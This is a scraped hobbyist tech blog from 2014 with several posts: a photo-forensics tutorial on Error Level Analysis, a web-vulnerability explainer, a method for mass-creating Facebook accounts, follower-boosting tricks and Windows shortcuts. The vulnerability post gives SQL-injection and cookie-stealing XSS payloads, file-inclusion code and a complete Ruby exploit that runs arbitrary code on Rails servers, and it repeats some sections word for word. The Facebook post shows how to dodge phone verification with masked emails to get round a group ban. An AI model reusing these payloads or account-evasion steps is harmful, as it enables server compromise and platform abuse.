Thursday, 3 July 2014

Photo Forensics: Detect Photoshop Manipulation with Error Level Analysis


Introduction

Error Level Analysis is a forensic method to identify portions of an image with a different level of compression. The technique could be used to determine if a picture has been digitally modified. To better understand the techniques, it’s necessary to deepen the JPEG compression technique.
JPEG (Joint Photographic Experts Group) is a method of lossy compression for digital images. It’s a data encoding algorithm that compresses data by discarding (losing) some of it. The level of compression could be chosen as a reasonable compromise between picture size and image quality. A JPEG compression scale is usually 10:1.
The JPEG algorithm works on image grids, compressed independently, having a size of 8×8 pixels. The 8X8 dimension was chosen after numerous experiments with other sizes, any matrices of sizes greater than 8 X 8 are harder to be mathematically manipulated or not supported by hardware, meanwhile any matrices of sizes less than 8 X 8 don’t have enough information. They result in poor quality compressed images.
For images not digitally modified, all 8×8 grids should have a similar error level, resaving the picture. Each square should degrade at approximately the same rate, due to the introduction of an homogeneous amount of errors across the entire image. In a modified image, the altered grid should be at a higher error potential in respect to remaining part of the image.

Image manipulation and analysis

In August 2007, Dr. Neal Krawetz made an interesting presentation during the Black Hat conference titled “A Picture’s Worth.” It involved determing if a picture is real, or of a computer modification. Error Level Analysis (ELA) is one of the simpler methods presented by the researcher. In 2010, Pete Ringwood created the “errorlevelanalysis.com” website as a free service where people could submit photos and web pictures for analysis. The site was later closed. Hacker Factor has recreated the service “fotoforensics.com.” It’s free and allows any user to perform ELA analysis on their own photos.
The methods to analyze the images presented by Krawetz are:
  • Observation
  • Basic image enhancements
  • Image format analysis
  • Advanced image analysis
ELA Error Level Analysis is a very useful method to detect the manipulation of images belonging to an advanced image analysis. ELA works by re-saving the image at 95% compression, and evaluating the difference with the original. Modified areas are easily seen due their characteristic aspects in the ELA representation.
The main methods used for the picture analysis are based on the following clues:
  • Shadows- Analyze the shadows related to different objects in the picture, evaluating them in relation to the direction of the light source.

  • Eyes- Zoom in and compare against other eyes. (Dots/colors give light direction)

  • EXIF- Evaluating of EXIF file dat,a including GPS position, time and RBG color profile changes.

  • Reflections- Analyze that the reflection within the image is coherent.
Principal free tools are:
ToolDescriptionURL
FotoForensicsPhoto ELA Error Level Analysis Image Toolhttp://fotoforensics.com/
Jeffrey’s Exif ViewerOnline EXIF data and GPS viewer analyzerhttp://regex.info/exif.cgi
JPEGsnoopFake image detection via image signature analysishttp://sourceforge.net/projects/jpegsnoop/
IEXIF 2Iexif is a professional Exif viewer in Windowshttp://opanda.com/en/iexif/

Image compression – the mapper

Every computer image is composed of pixels made of three colors: red, green, and blue (RGB). The color value of a pixel is represented with a byte (0-255). The mapper (aka decoder) modifies the RGB color space to YCbCr color space, Y is the luminescence, Cb and Cr are the chrominance-blue and chrominance-red color portions. In YCbCr color space, most of the image data is available in Y component, Cb and Cr have color information.
Figure – YCbCr representation
The mapper splits the images into a sub-image grid of 8X8, while JPEG always encodes luminance with an 8×8 grid. The chrominance may be encoded using 8×8, 8×16, 16×8, or 16×16. For display, the JPEG mapper converts the image from YCbCr to RGB.

The principle behind ELA

Error Level Analysis evaluates the quality level for grids squared within the images. They present an increased degree of error during successive resave operations. The phenomenon is obvious if images aren’t optimized for a specified camera quality level. Subsequent resaves reduce the error level potential, producing a darker ELA. After a number of resaves, the grid square reaches its minimum error level.

The Image Error Level Analyzer

The Image Error Level Analyzer in an online tool that implements an ELA algorithm. By using it, it’s possible to rapidly discover image manipulation. The web tool is based on the Python Image Library and the libjpeg library (v6.2.0-822.2). The verification process consists of successive resaves of the image at a predefined quality. The resulting picture is compared with the original one.
If an image hasn’t been manipulated, all its parts have been saved the same number of times, images are composed by a portion of other sources, or have been simply been manipulated, will show different level of errors visible in the ELA representation with different colors.
The authors of the website also developed a Firefox plugin that enables users to analyze an image by simply right-clicking on any image on the internet.
With the ELA method, it’s possible to discover image modification by establishing a chronological order of changes of various parts of the image. The lighter parts have been edited most recently, the most opaque have been saved several times.
Although it accepts images of limited sizes, it also allows the submission of images up to 1224 pixels per side.
The Test
The first step is the generation of an ELA image. Upload an image on http://fotoforensics.com, or simply provide its URL.
Figure – ELA web tool
After pressing the “Process” button, users are redirected to a page containing the original image and the ELA. Let’s start with the original image:
Figure – Original Image
Then modify it by introducing a stack of coins and changing the aspect of the toad:
Figure – Altered image
At this point, let’s submit the picture to the online service to generate the following ELA representation.
Figure – ELA image
The sections that are black correspond to the parts that usually aren’t manipulated. Solid white blocks usually represent the same. Solid colors present a good level of compression with minimal error levels, displayed as darker areas in the image. ELA highlights the altered portions of the image that represent higher ELA values, and a bright white color. Note that in the outline of objects in high frequency areas, they usually have higher ELA values than the rest of the image. In the following image, the text of the books stands out because the contrast creates a high frequency edge.
“In general, you should compare edges with edges and surfaces with surfaces. If all surfaces except one have similar ELA values, then the outlier should be suspect.”
ImageELA
Another interesting example is provided by the Hacker Factor Blog (http://www.hackerfactor.com), this time an an allegedly winning lottery ticket is under analysis.
ELA shows that the image has been modified, the digit “4″ has been inserted in the “04″ and “46″, and both “23″ values were altered.
ImageELA
The tool could provide false-negative results when different portions of the image have been resaved the same number of times. In this case, all the areas present same degree of error.
There are some limitations to consider when conducting an ELA analysis. The technique operates on JPEG images based on a grid, changes to a portion of a grid to affect the entire grid square. That makes it impossible to identify the pixel modified. ELA can’t detect single pixel modification or minor color adjustment.
Scaling and recoloring the picture impacts the entire image, introducing a greater error level potential.
Another element of noise for ELA is represented by the presence of high contrast colors within the same grid, for example black and white colors, which generate high ELA values. This anomaly is attributable to the fact that JPEG uses the YUV color space representation.
Thanks to ELA analysis, it’s possible to discover if the image was the result of a conversion from another format. For example, if a non-JPEG image contains visible grid lines (1-pixel wide in 8×8 squares), it means the picture was originally a JPEG that was later converted to a non-JPEG format.
Another interesting case in ELA literature is that in an image converted from the PNG format to JPEG, ELA analysis produces very high levels of error in edges and textures. That appears as a prevalence of dark or black coloring. A conversion from JPEG to PNG is lossless, and will retain JPEG artifacts.

The rainbowing technique

Rainbowing indicates the visible separation between the luminance and chrominance channels, as blue,purple and red.
Rainbowing evaluation is possible because JPEG separates colors into luminance and chrominance channels. The luminanceis the gray-scale intensity of the image, while the chrominance-red and chrominance-blue components identify the amount of coloring, independent of the full color’s intensity.
Picture modification with commercial tools such as Photoshop or Gimp can introduce distinct rainbowing pattern surfaces that have near-uniform coloring. High-quality camera photos may also include a rainbowing effect along uniformly colored surfaces.
Photoshop and other Adobe products introduce a large amount of rainbowing, different from other tools such as Microsoft Paint, that don’t do so.
Beware that the presence of rainbowing may only mean that an Adobe product, like Photoshop or Lightroom, was used to save the image. It may not represent proof of intentional image alteration.

A controversial case

During the last World Photo Awards,World Press Photo said that Paul Hansen’s photo of mourners in Gaza was “retouched with respect to both global and local color and tone,” despite that there was no evidence of manipulation. Experts using ELA analysis were able to demonstrate a meaningful rainbowing effect (faint red and blue patches) and the presence of a higher ELA value on edges and textures were probably caused by Photoshop’s unintentional auto-sharpening.
Figure – Original image
Figure – ELA
The rainbowing effect is clearly visible in various portions of the image, such as the sky, walls, and people. Another source of information is the metadata. Analyzing that makes it possible to evaluate the congruence of the light of the image.
In this specific case, the photo was taken in the morning in November in the northern hemisphere, when the sun should be low on the horizon. The strong shadows on the left building allowed an expert to draw lines that intersect in the general direction of the sun. The sun wasn’t quite low, but maybe the reported time was wrong, and the lighting on the people doesn’t match the sun’s position.
“The people should have dark shadows on their right sides (the left side of the photo), but their facial lighting does not match the available lighting.”
According to the experts who analyzed the photo, it’s likely that the photographer took a series of photos and combined a few pictures, altering some aspects of the image.

Conclusion

Despite that proper application can allow experts to easily discover image modification (including scaling, cropping and resave operations), ELA analysis depends on the quality of the image. Working on a picture resulting from numerous resave operations isn’t effective.If an image is resaved numerous times, then it may have a minimum error level, where more resaves don’t alter the image. ELA will return a black image, and no modifications may be detected.
The technique is very effective at discovering alterations introduced with tools like Photoshop or Gimp. By just saving a picture with these applications, users introduce a higher error level potential in the image.
The downside is that these tools could be the cause of unintentional modification. Considered in the analysis of any picture that ELA is just an algorithm to analyze the images. Despite that it’s very efficient under specific conditions, it’s suggested to integrate it with other forensics tools to provide valid results.
Hope you guys likes it, If you guys have any Questions regarding this Comment Below :)

Wednesday, 2 July 2014

Webapplication Vulnerabilities Explained


Hey Guys, So I'm making this Tutorial on the most common website vulnerabilities and how they work. Hopefully people in this section will learn something off it, and might be able to use it when they Pentest a website! ^^



What I'll be discussing is:

    1) DoS (Denial of Service) Attacks
    2) SQL (Structured Query Language) Injection
    3) XSS (Cross-Site Scripting) Attacks
    4) Buffer Overflow Attacks
    5) RFI and LFI (Remote/Local File Inclusion)
    6) CSRF (Cross-Site Request Forgery) Attacks
    7) Brute-Forcing
    8) RCE (Remote Command Execution)
    9) MITM (Man In The Middle) Attacks
    10) Parameter Tampering

So let's get onto it! 

1) DoS (Denial of Service) Attacks

The Denial of Service happens for various reasons, but I won't describe anything like attackers trying to DoS a specific website with a botnet or compromised computers. I'd rather describe how a DoS vulnerability can happen when writing a code.

Usually we have to make a logical mistake to create a DoS scenario in our web application. Let's present such a scenario with a little PHP code. The code below is a PHP sample code that contains a logical error that can be exploited to cause a denial of service.

Code:
1
<?php
if(empty($_GET['file']))
  die('You didn't enter the file parameter.');

$file = $_GET['file'];
if(!file_exists($file))
  die('The chosen file does not exist.');
include($file);
?>
1

In the above code, I'm first checking wether the file parameter exists. If yes, I'm reading the value stored in the file parameter, otherwise I'm closing the application with an error message that says that I didn't enter the file parameter. Thus, we have to provide the file parameter in order to continue execution of the application. After that, we're reading the value stored in the file parameter and checking wether the file exists. If it doesn't, we're again closing the application with an error message about a non-existent file. But if a file does exist, we're including it into the current application execution. From the above code it's not instantly evident that the code contains a vulnerability that can result in a denial of service.

Let's say that we saved the above code as index.php and we're supplying a value of testing.php in a file parameter. In such a scenario everything works fine as long as the testing.php file exists and does some work. But what happens if we provide index.php as a value for the file parameter. In such a case, the index.php file is including itself into the current execution, and this happens infinitely, resulting in a denial of service. By default, the operating system allocates just so much memory to each application, that if that application wants more memory, it is usually forcibly closed by the operating system. This is exactly what happens in this case. When the index.php allocates as much memory as permitted, the operating system forcibly closes it.

Let's also present a request that we would have to send to the above application to force a DoS. Such a request is presented below:

Code:
GET /index.php?file=index.php HTTP/1.0

2) SQL (Structured Query Language) Injection

SQL injection is still quite common these days, even though it's been presented for over ten years. SQLi vulnerability happens when the application isn't checking the input values for special characters and encapsulating them, and uses the inputted value in the SQL query. An example of such an application is posted below: 

Code:
1
<html>
<body>

<?php
  $show = 1;
  if(!empty($_GET['username']) and !empty($_GET['password'])) {
    $user = $_GET['username'];
    $pass = $_GET['password'];

    mysql_connect("localhost", "admin", "admin");
    mysql_select_db("db");
    $result = mysql_query("SELECT * FROM users WHERE username='".$user."'
      AND password='".$pass."';");
    $row = mysql_fetch_row($result);
    if($row) {
      echo "Welcome user: ".$user;
      $show = 0;
    }
  }
?>

<?php if($show) { ?>
<form action="#">
  Username: <input type="text" name="username" /><br />
  Password : <input type="password" name="password" /><br />
</form>
</body>
</html>
<?php } ?>
1

We can see that we're checking wether the parameters username and password exist and have a correspondent value. If they have, we're reading the values into the $user and $pass variables. Afterwards, we're connecting to the SQL database on localhost:3306 with a username admin and password admin and selecting the database db. Then, we're constructing an SQL query sentence in which we're including the exact values from the username and password inputted values without checking it for special characters. 

But we should do that, because the above code is vulnerable to SQL injections, because we're not encapsulating the username and password inputted values. Imagine that we enter a value 'OR 1=1--' into both the username and password field. After that the constructed SQL query will be as follows: 

Code:
SELECT * FROM users WHERE username='' OR 1=1--'' AND password='' OR 1=1--''

This effectively selects all users from the table users because of the OR directive we've passed to the vulnerable application. The above SQL query is always evaluated to trueand we don't need to enter the right username and password, which would log us into the application. Instead we can enter special input values to break the logic behind the application and login nevertheless.

3) XSS (Cross-Site Scripting) Attacks

This attack is arguably as common as the original three. The cross-site scripting attack allows us to inject arbitrary code into the vulnerable webpage, which we can use to obtain sensitive information like usernames, passwords, cookies, etc. With the XSS attack we can circumvent the same-origin policy, which is present in all scripting languages executing at the client-side in a webbrowser. An example of such a language is Javascript. The same-origin policy allows the webbrowser to execute the client-side code only on a webpage from which the code originated.

There are three types of XSS attacks: 

1) Non-persistent XSS
The webpage is vulnerable if it accepts the user input and displays its contents on a webpage without proper validation of special characters like slashes, apostrophes, etc. In such cases we can include a javascript in the URL that we send to the user, which clicks on a link. Upon that, the included Javascript is executed in the users' browser. The Javascript can grab the users' cookie and sends it to the attackers' network. An example of an application that conatins the reflected XSS vulnerability is shown below:

Code:
<html>
<body>

<?php
  if(isset($_GET['p'])) {
    print "Habbahabbahabba: " . $_GET['p'];
  }
  else {
    print "habbahabbadoublehabba.";
  }
?>
</body>
</html>

First, we're checking to see if the parameter p is set and displaying its value without filtering any of the special characters. We can store a Javascript code in a value of parameter p that will be executed when the user clicks on the URL. An example of the URL that contains the Javascript code, which displays the user's cookie, is as follows:

Code:
GET /index.php?p=<script>alert(document.cookie)</script> HTTP/1.1

2) Persistent XSS

A persistent XSS attack is present when we can store the malicious code inside the vulnerable webpage permanently. Thus, our code will be executed every time a user visits the vulnerable webpage. Because the code is stored right in the webpage, we don't have to send emails to users convincing them to click on the link or something. Such a webpage must use some kind of a backend database where the users inputted values are stored. When someone visits a webpage, those values are taken from the database and displayed on the webpage, and thus executing the code.

3) DOM-based XSS

DOM-based XSS attacks happen when we send a malicious url to the user, who clicks on it. But this isn't the same as with non-persistent XSS attacks, because the website returns a valid non-malicious response. So the website is not vulnerable to non-persistent XSS attacks. The attack happens because the website uses a Javascript code that in turn uses the values from the URL address. An example of a DOM-based XSS is shown below.

Code:
<html>
<body>

<script type="text/javascript">
  p = document.location.href.substring(document.location.href.indexOf("p=")+2);
  document.write("Sup HF xD: " + p);
</script>

</body>
</html>

From the source code we can see that we're getting that Javascript back as a response on a request. That Javascript first reads the value of parameter p from the used URL address into a variable p. 
Afterwards it displays the value of parameter p. Because of this, the javascript is actually referring to the value stored in that parameter, which can be a malicious Javascript code. Let's say we're executing the request below:

Code:
/index.php?p=<script>alert(document.cookie)</script>

When the Javascript from the response is executed, it will read the value of parameter p, which is <script>alert(document.cookie)</script> and include it into processing. Therefore the malicious code in parameter p is executed nevertheless, even if the website is not vulnerable to persistent or non-persistent attacks.

4) Buffer Overflow attacks

Sometimes we can see executable programs being used as part of the application providing unique features. But even though the executables are still being used as part of web applications, buffer overflow vulnerabilities still exist. Imagine that web application is calling a system function to call an executable with the user inputted parameter. This doesn't prevent the bfufer overflows that could be present in executables from overflowing the program stack or heap structures.

An example of a program that contains a buffer overflow vulnerability:

Code:
void copy(char **argv) {
  char array[20];
  strcpy(array, argv[1]);
  printf("%sn", array);
}

main(int argc, char **argv) {
  copy(argv);
}

The program accepts arguements, but doesn't check the length of it. When it accepts the arguement, it's sent to the copy function, which copies it in a local buffer with thestrcpy function call. Though, there are only20 reserved bytes in the local array, so if an arguement is longer than 20 characters, a buffer overflow will occur. This causes the program to crash.

5) RFI and LFI (Remote/Local File Inclusion)

A RFI and LFI vulnerability allows users to read through the files from a filesystem, but fails to identify which user is allowed to read which file. This is also called Directory Traversal. This vulnerability usually occurs when a webserver doesn't check what file a user is trying to read. The main problem is that the application is not checking wether a user is trying to move up the directory or is looking into the parent directory by using the ../ or ... Because of that person cannot only read the directory the application uses, but all directories the application has access to.

An example of a vulnerable application:

Code:
<?php
if(empty($_GET['file']))
  die('You didn't enter the name of the file.');

$file = getcwd().'/'.$_GET['file'];
if(!file_exists($file))
  die('The filename doesn't exist.');

readfile($file);
?>

In the above code we're checking if the parameter file exists and contains a value. After we've constructed a path to the file that we're trying to read with the use of getcwdfunction that gets the current directory and appends it the value of the parameter p. At the end we're reading the file from the constructed path.

The problem occurs because we're not checking for any special characters in parameter p. This allows the attacker to browse up the directory tree. 


1) Local File Inclusion

With Local File Inclusion we're including the local file into current execution. By local I mean that the file is already present on the server's system. This is possible because the application doesn't capture the input of the attacker. Often Shells are uploaded with malicious PHP code that give access to the website's file manager etc.

2) Remote File Inclusion

With Remote File Inclusion we're including a remote file into the current execution. This can happen if the application has an upload option. In such cases, we can upload aShell to the filesystem and execute it. With this attack, we can take total controll as well.

Code:
<?php
if(empty($_GET['file']))
  die('You didn't enter the name of the file.');

$file = getcwd().'/'.$_GET['file'];
if(!file_exists($file))
  die('The filename doesn't exist.');

include($file);
?>

6) CSRF (Cross-Site Request Forgery) Attacks

A CSRF Vulnerability occurs when we can plant a request to a user, which is then sent to the targeted website in his/her name. The request then executes an action on the target website in the user's name. 

There are two questions we need to ask ourselves:

    1) How can we plant a request to the user?
    2) What kind of action can we execute on the target website?

The answer to the first question is simple. There are serveral way of doing this. Some are:

    1) In case the target website is vulnerable, we can temporarily inject some code in it. We need to construct the right URL that we sent to the user, and they need to click on it. If clicked, the request will be sent. But because of the vulnerability a second request will be made.
    2) Incase the target website is vulnerable and we can permanently inject code in it, we can just insert another request into the sourcecode of that webpage. Whenever for example the admin visits the page, the code will be executed and the action will be executed in their name. This doesn't even need social engineering since all the user needs to do is visit the page.
    3) We can also make our own page, which we have 100% control over. This way our code will work on our own webpage, though we have to make him/her click a link to our own webpage. And when the user visits our page, the action will be executed.

As you can see there are many ways to plant a request to the victim's browser. Though, we're only on half the story; we still need to talk about what kind of request we can inject to the site. We can do anything we like, the only condition we have is that the page has to support the action in order to execute it properly.

Let's say we have the page below:

Code:
<html>
<body>
  <img src="http://www.anything.com/index.php?id=1000&action=up"/>
</body>
</html>

If the user visits this page, a new request will be made requesting the index.php resource on the page shown in the code. But if that page doesn't have the page index.phpthe request will fail, if the index.php is there but doesn't use the parameters id and action, it fails as well. This means we need to know something about the files present on the system.

7) Brute-Forcing

This method is the practice of running a program to keep guessing the password and username of a website. This method is fastly going out of fashion as a maximum of login attempts has been added and spamcontrol like Captcha's has been added. Besides that, even without those obstacles it can take weeks to get the right password. The most common programs used for this are Hydra and Brutus. 

For Brute-Forcing with these programs you need a wordlist with passwords to guess. These are easy to find on the internet and can contain thousands to millions of words. On Youtube are alot of tutorials on brute-forcing with Hydra and Brutus. I'm not going to explain that in here since it's just a matter of filling in some stuff.


8) RCE (Remote Command Execution) Attacks

An RCE vulnerability includes that an attacker sends a crafted XML request to the application containing an embedded YAML-encoded object. Rails' perses the XML and loads the objects from YAML. In the process, arbitrary Ruby code sent by the attacker may be executed. This depends on the type and structure of the injected objects. 

This is an easy to pull-off exploit and only requires the URL of an application in order to send a Ruby Payload. Though, it's easy to detect and fix, but you have to be cautious since it's easy to take over the host and steal data using this vulnerability.

So, stop the shit. How does it work?

Okay, so knowing that Rails will YAML. load the payload, the only difficulty is building a try of objects that, when deserialized, executes arbitray Ruby code in the payload. The object graph must be constructed using only classes that are present in the process.

Code:
require "net/https"
require "uri"
require "base64"
require "rack"

url   = ARGV[0]
code  = File.read(ARGV[1])

# Construct a YAML payload wrapped in XML
payload = <<-PAYLOAD.strip.gsub("\n", "
")
<fail type="yaml">
--- !ruby/object:ERB
  template:
    src: !binary |-
      #{Base64.encode64(code)}
</fail>
PAYLOAD

# Build an HTTP request
uri = URI.parse(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == "https"
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
request = Net::HTTP::Post.new(uri.request_uri)
request["Content-Type"] = "text/xml"
request["X-HTTP-Method-Override"] = "get"
request.body = payload

# Print the response
response = http.request(request)
puts "HTTP/1.1 #{response.code} #{Rack::Utils::HTTP_STATUS_CODES[response.code.to_i]}"
response.each { |header, value| puts "#{header}: #{value}" }
puts
puts response.body

9) MiTM (Man in The Middle) Attacks

Normally when you browse the World Wide Web, the local network traffic is being sent from your computer to the gateway and from there on, it will disappear in the cloud we call internet. But when a MiTM occurs the traffic will go from your computer to the attackers computer, to the gateway and all the way back. Hereby the attacker is able to sniff all your outgoing and incoming network traffic. This is only possible when the attacker is on the same network as you are. A quick illustration of a normal packet flow and a malicious one is shown below:

Normal request:
Your_PC -> Gateway -> Internet
Your_PC <- Gateway <- Internet

MiTM request:
Your_PC -> Attacker_PC -> Gateway -> Internet
Your_PC <- Attacker_PC <- Gateway <- Internet

10)Data Tampering

Parameter tampering is a form of Web-based attack in which certain parameters in the URL or Web page form field data entered by a user are changed without that user's authorization. This points the browser to a link, page or site other than the one the user intends (although it may look exactly the same to the casual observer).

Parameter tampering can be employed by criminals and identity thieves to surreptitiously obtain personal or business information about the user. Countermeasures specific to the prevention of parameter tampering involve the validation of all parameters to ensure that they conform to standards concerning minimum and maximum allowable length, allowable numeric range, allowable character sequences and patterns, wether or not the parameter is actually required to conduct the transaction in question, and wether or not null is allowed.

Well... That was a shitload of info ^^. Obviously people and G00gle helped me, so alot of thanks from them! A big thanks to Dejan Lukan from InfoSec as well! Without him this thread wouldn't have been made ^^. I hope you guys learnt something and if I left out something please leave a comment below.

I know these are obviously not ALL web-application vulnerabilities. These are some of them. But the thread was already waaaaay too long, so I left some out.

Peace guys


8) RCE (Remote Command Execution) Attacks

An RCE vulnerability includes that an attacker sends a crafted XML request to the application containing an embedded YAML-encoded object. Rails' perses the XML and loads the objects from YAML. In the process, arbitrary Ruby code sent by the attacker may be executed. This depends on the type and structure of the injected objects. 

This is an easy to pull-off exploit and only requires the URL of an application in order to send a Ruby Payload. Though, it's easy to detect and fix, but you have to be cautious since it's easy to take over the host and steal data using this vulnerability.

So, stop the shit. How does it work?

Okay, so knowing that Rails will YAML. load the payload, the only difficulty is building a try of objects that, when deserialized, executes arbitray Ruby code in the payload. The object graph must be constructed using only classes that are present in the process.

Code:
require "net/https"
require "uri"
require "base64"
require "rack"

url   = ARGV[0]
code  = File.read(ARGV[1])

# Construct a YAML payload wrapped in XML
payload = <<-PAYLOAD.strip.gsub("\n", "
")
<fail type="yaml">
--- !ruby/object:ERB
  template:
    src: !binary |-
      #{Base64.encode64(code)}
</fail>
PAYLOAD

# Build an HTTP request
uri = URI.parse(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == "https"
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
request = Net::HTTP::Post.new(uri.request_uri)
request["Content-Type"] = "text/xml"
request["X-HTTP-Method-Override"] = "get"
request.body = payload

# Print the response
response = http.request(request)
puts "HTTP/1.1 #{response.code} #{Rack::Utils::HTTP_STATUS_CODES[response.code.to_i]}"
response.each { |header, value| puts "#{header}: #{value}" }
puts
puts response.body

9) MiTM (Man in The Middle) Attacks

Normally when you browse the World Wide Web, the local network traffic is being sent from your computer to the gateway and from there on, it will disappear in the cloud we call internet. But when a MiTM occurs the traffic will go from your computer to the attackers computer, to the gateway and all the way back. Hereby the attacker is able to sniff all your outgoing and incoming network traffic. This is only possible when the attacker is on the same network as you are. A quick illustration of a normal packet flow and a malicious one is shown below:

Normal request:
Your_PC -> Gateway -> Internet
Your_PC <- Gateway <- Internet

MiTM request:
Your_PC -> Attacker_PC -> Gateway -> Internet
Your_PC <- Attacker_PC <- Gateway <- Internet

10)Data Tampering

Parameter tampering is a form of Web-based attack in which certain parameters in the URL or Web page form field data entered by a user are changed without that user's authorization. This points the browser to a link, page or site other than the one the user intends (although it may look exactly the same to the casual observer).

Parameter tampering can be employed by criminals and identity thieves to surreptitiously obtain personal or business information about the user. Countermeasures specific to the prevention of parameter tampering involve the validation of all parameters to ensure that they conform to standards concerning minimum and maximum allowable length, allowable numeric range, allowable character sequences and patterns, wether or not the parameter is actually required to conduct the transaction in question, and wether or not null is allowed.

Well... That was a shitload of info ^^. Obviously people and G00gle helped me, so alot of thanks from them!  I hope you guys learnt something and if I left out something please leave a comment below.

I know these are obviously not ALL web-application vulnerabilities. These are some of them. But the thread was already waaaaay too long, so I left some out.

Peace guys

Tuesday, 1 July 2014

How To Create Unlimited Facebook Accounts *Without Any Phone Number*


First of all i joined a buy and sell group on Facebook .. but when i posted products because they are cheap they kicked me out!


so i made another Facebook account but when i did new one the new Facebook account wants a Phone number to verify the account.. so i searched all the results in Google and saw 1 worked method but you can only make 1 account not unlimited.. because they give you 1 phone number only.. i hated this method..

So i worked hard on this and made a method for me and i would love to share it for the first time on internet! here's the method :

Follow The Steps From 1 to 5 (Step By Step)

1- Download in GoogleChrome: MaskMe 2- Download In Firefox: User Agent Switcher 3- Go to Firefox Browser > Tools > Default User Agent > Choose Iphone 3.0 4- Go to Google Chrome go to mask me extension and here'show you work on it:
ABINE

5- You navigate in firefox to Facebook.com you will see Facebook Touch (mobile version) the link should be just like this : "http://m.facebook.com/"

You will register with the masked emails and all the emails you did are forwarded to your email you made in mask me. 
It means : all the emails are connected into the masked mail inbox!

So every account needs a confirm and you will confirm them in the same inbox

Get 5000 FREE Facebook Friend Request


Today I'll show you how to get more than 5000 add request but 60 every 3 days.. so you will need to repeat the steps every 3 days or you can do it daily.. but i prefer every 3 days because a new list updates every 3 days.. So here we go it's so simple just like the
[Twitter] Get 500 FREE instant twitter followers that i made..  Just follow the steps (Step by Step) :


+ Aloow The Application

Click the generate button
That's all
<-- Proof And It's Still Adding

Get 500 FREE Instant Twitter Followers



Today i will share this to you!, i saw a very easy trick to get 500 follower on twitter but with this trick? i don't think there's more easy as this lol all you need to do is to visit this website and enter your username:


Then click the button below, now it's time to wait till the 500 followers to be added

Easy ? Yea i know ^_^

Tuesday, 24 June 2014

Computer Tricks You Should Try Right Now


Computers have simplified our life to a great extent. Things that were impossible earlier can now be completed instantly thanks to computers. But, does this mean that a PC is all work and no play?

Obviously not! Here are some of the best tricks you can try out on your Windows based computer.



Computer Tricks
Make your computer speak what you type
You can use your PC's built in features and some VBScript magic to create a simple program that will make your computer speak whatever you input to it. What are you waiting for? Head over to this post to start a conversation.

Find your computer's gender
Want to know if your PC is a male or a female? Simple. Try the previous trick to know if your computer is a 'he' or a 'she'. 

On a serious note, this depends upon the voice you have selected in Microsoft Text to Speech options.

Lock Folders with password
Do you often have other people seeing your personal files? You can store them in a password protected folder so that only you can access them. Go see this post to know how to protect your personal files effectively.

Make your computer greet you every time you start Windows
A simple modification in the first trick will let you have an awesome computer said welcome that you can use to impress all your friends. Just read this post to make your computer welcome you in its own mechanical voice.

Have fun with Notepad

PC Tricks
If you think that Notepad is just a basic text editor, then, you will be amazed by its capabilities. You can use Notepad to create everything from personalized logs to harmless viruses that are incredibly annoying. Go see this post to know just how useful Notepad is.

Command Prompt too has some tricks up its sleeves
So, you thought that Notepad has some tricks but not the command prompt? If you thought so, then you would be surprised to see all the cool stuff you can do with the Windows Command Prompt. Just see this post to get impressed.

Change your Processor's name
Are you bored of your old processor and want a new one with a staggering name? Change its name to something extraordinary to get that something special for your PC.

Make a Keyboard Disco
Use some VBScript coding to create a live disco using the LED keys on your keyboard. See this post to know how your keyboard can turn into a disco.

Use your Keyboard as Mouse.
You know you can use your mouse as keyboard using the On-screen keyboard. What if I tell you that it is also possible to do the reverse? Just read this post to see how.

Use Keyboard Shortcuts to get work done in no time
Use some amazingly useful keyboard shortcuts to greatly increase your efficiency when working on a Windows computer. See this post for details.

These tricks work on Windows 8, Windows 7, Windows Vista and Windows XP.

Useful Keyboard Shortcuts for Windows Computers


While most of us are already aware of obvious keyboard shortcuts like “Alt+F4” and “Ctrl+C”, there are some obscure shortcuts which most of us tend to overlook. These keyboard shortcuts are not only useful for the average PC user but for advanced users as well. This article contains many such amazing keyboard shortcuts which if used properly could save a lot of time and effort. So let's get started.

Windows key+D: This shortcut is the keyboard equivalent of “Show the Desktop”. It is useful for quickly minimizing every open window when someone walks in and you are doing some private work.

Keyboard Shortcuts Windows

Ctrl+Shift+Esc: This shortcut directly starts the task manager. While Alt+Ctrl+Del used to bring up the Task Manager in Windows XP and earlier versions, in Windows 8 and Windows 7, it just brings up the lock this computer screen.

Ctrl+Click: This shortcut is useful for opening a link in a background tab. This is useful when you have to load a page without leaving the current one.

Alt+Print Screen: takes the screenshot of the current active window as opposed to just Print Screen which takes the screenshot of the entire screen.

Shift+Click for Yes to All and No to All: If you have a lot of dialog boxes asking yes and no question, just shift+click Yes or No on one to yes all or no all.

Ctrl+C on an error dialog box to copy its contents: Suppose your computer is giving an error message and you want to copy its contents to send to the support guy, what do you do? Just press Ctrl+C while the dialog box is highlighted and its contents will be copied to your clipboard.

Ctrl+T: This keyboard shortcut opens a new tab in internet browsers.

Ctrl+Shift+T: Reopens the last closed tab.

Ctrl+Shift+N: This shortcut opens a new incognito window in Google Chrome.

Ctrl+Shift+P: Opens a new private window in Mozilla Firefox.

Alt+Enter after writing the domain name in the address bar of your browser to insert .com automatically.

Shift+Enter inserts .net domain name extension.

Ctrl+W: This shortcut closes the current tab in your browser quickly.

Ctrl+Backspace: This shortcut deletes the last word you have typed. It is useful in case you typed in a wrong word and want to delete it quickly.

Ctrl+Left or Right Arrow key: This shortcut allows you to move the cursor one word at a time instead of the default one character at a time.

Ctrl++: This shortcut allows you to zoom in web pages in web browsers. Useful when text on a web page is too small to read properly. Ctrl+Scroll wheel can also zoom in documents, file thumbnails and icons in Windows 8, Windows 7 and Windows Vista.

Ctrl+-: This shortcut does the reverse of the previous shortcut.

Ctrl+0: Reset the webpage's zoom.

Windows key+M: Minimizes all the open windows.

Ctrl+L: This shortcut allows you to quickly jump to the address bar of your web browser.

Windows key+Pause/Break: Quickly open the system properties dialog box. 

Ctrl+Shift+Delete: This shortcut opens the option to delete your browser's history, cookies, cache and other details that it stores while you browse the internet. This shortcut is extremely useful for the privacy conscious.

Windows Key+L: This shortcut locks your computer.

Ctrl+H: makes the history appear.

CTRL+B: Bold CTRL+U: Underline CTRL+I: Italic.

Alt+Select: This shortcut allows you to select rectangular blocks of text in Word processors, something that is not possible with simple select.

F2: Allows you to rename the selected file.

Holding Shift while inserting a device with removable storage prevents automatic run.

Ctrl+F: This keyboard shortcut opens the Find option in any program.

Ctrl+S: If you are working on a software and want to quickly save your progress, this shortcut will come in handy.

